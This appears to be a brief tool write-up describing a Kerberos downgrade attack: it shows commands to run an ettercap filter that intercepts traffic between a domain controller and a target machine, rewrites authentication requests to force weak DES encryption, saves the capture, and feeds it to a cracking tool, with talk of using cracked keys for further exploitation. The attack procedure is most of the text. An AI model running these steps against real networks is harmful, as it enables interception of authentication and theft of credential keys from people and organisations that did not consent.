Kerberos5 DES
There’s still many legacy Windows and Linux environments that support RC4 and DES for Kerberos. Especially on corporate networks where there are older production machines or software, it’s unusually common to find these methods still in use these days. The best way to check if it’s allowed on a windows machine is to check the SupportedEncryptionTypes setting.
Capturing
Most of the time, even though DES is supported it typically isn’t the first option that’s used. To force clients to downgrade to DES so we can capture ciphertext, we put together a simple ettercap filter in our des_kpt repo that can be used:
$ cd krb5_ettercap
$ vi krb5-downgrade-asreq.sh
...
export KDC="192.168.1.11"
export TARGET="192.168.1.27"
export ETH="enp0s3"
...
$ ./krb5-downgrade-asreq.shThis will MITM the connection between the KDC and TARGET and replace the supported encryption types in all of the TARGET -> KDC AS-REQ packets with des-cbc-crc and should downgrade all encrypted communication (TGS, Authenticators, etc) to des-cbc-crc and log it to /tmp/ettercap.pcap which you can then use to crack using des_kpt.
Submission
Now that we have a capture, we can then run des_kpt to generate submission tokens for any known-plaintext data in the packet capture.
$ cd ..
$ ./des_kpt.py kerb -i /tmp/ettercap.pcap
Using the Result
There currently aren’t any tools for making use of the cracked DES keys to login to machines, but we’re currently looking into the best ways to use the keys to authenticate with machines and further exploitation.